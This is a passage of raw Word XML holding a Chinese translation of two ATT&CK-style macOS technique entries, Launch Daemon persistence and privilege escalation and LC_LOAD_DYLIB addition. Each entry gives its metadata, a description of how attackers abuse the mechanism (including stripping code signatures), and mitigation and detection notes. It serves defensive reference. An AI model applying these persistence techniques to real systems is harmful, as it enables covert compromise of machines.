        <w:t>具备</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>持久性，也可以通过其他文件监视应用程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C1391" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008411D6" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00380E97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动守护进程</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="0D7B893F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5157536D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> T1160</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E286DD1" w14:textId="4C394933" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1009B003" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB228B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D02B0C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>有效权限</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t>: root</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14106B44" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:lastRenderedPageBreak/>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54EFC593" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="574CFE7E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="3FCC01FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apple </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的开发人员文档，当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> macOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>启动时，启动将运行以完成系统初始化。此过程从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/System/Library/LaunchDaemons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/Library/LaunchDaemons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>中找到的属性列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>plist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件中加载每个按需启动系统级守护程序的参数。这些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> LaunchDaemon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>具有指向将启动的可执行文件的属性列表文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10751510" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>对手可以安装一个新的启动守护进程，该守护进程可以通过使用启动或启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>ctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>时执行，从而将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>plist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>加载到适当的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>中。守护进程名称可以通过相关操作系统或良性软件中的名称进行伪装。启动守护程序可能使用管理员权限创建，但在根权限下执行，因此攻击者也可以使用服务将权限从管理员升级到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B5CB98" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">plist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件权限必须为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41B18">
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41B18">
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41B18">
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，但它指向的脚本或程序没有此类要求。因此，配置不佳可能会允许攻击者修改当前启动守护程序的可执行文件，并获得持久性或权限升级。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37507CAE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3570"/>
        <w:gridCol w:w="6166"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="704DEB3D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3570" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="25CBFFCC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6166" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1E20EDC2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AB74CB" w14:paraId="2DE65770" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7846731A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AB74CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AB74CB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户账号管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6166" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41BA94AC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AB74CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AB74CB">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>限制用户帐户的权限并修复权限升级矢</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t>量，</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>因此只有经过授权的管理员才能创建新</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>启动</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element-highlighted"/>
              </w:rPr>
              <w:t>守护程序</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78B52C11" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596873D9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>通过其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> plist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件和实用程序（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Objective-see </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的敲击应用程序）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>启动守护程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>创建。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1731266C" w14:textId="7A4E5196" w:rsidR="000F2665" w:rsidRDefault="008069DA" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>LC_LOAD_DYLIB Addition</w:t>
      </w:r>
      <w:r>
        <w:t>添加</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="2A7B83A3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="539BC7DD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> T1161</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A4F3FD4" w14:textId="159350AC" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5079FC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4364ADCF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="086CC262" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二进制文件元数据，进程监控，进程命令行参数，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F69D775" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001347D6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F75DFC7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4816ADC8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Mach-O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>二进制文件具有一系列标头，用于在加载二进制文件时执行某些操作。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>Mach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">-O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>二进制文件中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> LC_LOAD_DYLIB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>标头告诉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> macOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在执行期间加载哪些动态库（动态库）。只要对其余字段和依赖项进行长时间调整，这些字段可以临时添加到已编译的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>二进制文件中。有可用于执行这些更改的工具。任何更改都将使二进制文件上的数字签名无效，因为二进制文件正在被修改。攻击者只需从二进制文件中删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> LC_CODE_SIGNATURE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>命令即可修复此问题，以便在加载时不检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>签名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2915BF5A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2118"/>
        <w:gridCol w:w="7618"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="4940D2D0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
